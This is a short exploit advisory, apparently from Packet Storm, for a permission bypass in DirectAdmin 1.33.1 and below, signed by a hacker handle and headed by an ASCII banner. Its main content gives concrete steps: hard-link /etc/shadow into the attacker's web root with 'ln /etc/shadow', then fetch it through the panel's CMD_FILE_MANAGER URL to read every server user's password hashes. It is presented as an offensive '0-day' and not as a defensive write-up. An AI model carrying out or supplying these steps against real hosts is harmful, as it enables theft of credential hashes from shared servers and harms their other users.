DirectAdmin versions 1.33.1 and below suffer from a symlink permission bypass vulnerability.
53052199c58574efd9c8e08901a5480d5721d6a9a1745f95edae74e88a503fb3
/H\ /T\ |T-HHHHHHH-T| HHHHHHHHHH| HHHHHHHHHH|
H-T H-T \T-HHHHH-T/ HHHHHHHHH/ HHHHHHHHH/
H-T H-T H-T H-T H-T
H-THHHHHH-T /HHHHH\ H-T H-T H-T
H-THHHHHH-T THHHHHT H-T H-T H-T
H-T H-T \HHHHH/ H-T H-T H-T
H-T H-T H-T H-T H-T
H-T H-T H-T /H\ HHHHHHHHH\ HHHHHHHHH\
\H/ \T/ H-T \T/ HHHHHHHHHH| HHHHHHHHHH|
DirectAdmin <= 1.33.1 Permission Bypass UID="0"
Auther : S4S-T3rr0r!sT
Home : http://www.hackteach.org, http://www.h-t.cc
msn : l3t@hotmail.com / s4s@n2m3.com
.....................................
As known that the DirectAdmin Control Panel is better than Cpanel ..
But this is a vuln on it .. 0-day
First :
Exploiter should execute any command on the host .. use the 'ln' command for make a symbolic link
example :
In The root path => /home/attackeruser/domains/attackersite.com/public_html/
Execute :
ln /etc/shadow
After that Go to The Control Panel
https://attackersite.com:2222/CMD_FILE_MANAGER/domains/attackersite.com/public_html/shadow
Its now should be the same as attackersite.com Permission
You can read the shadow and see all server users hashs
Also its runs on the other users of server ..
.....................................
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed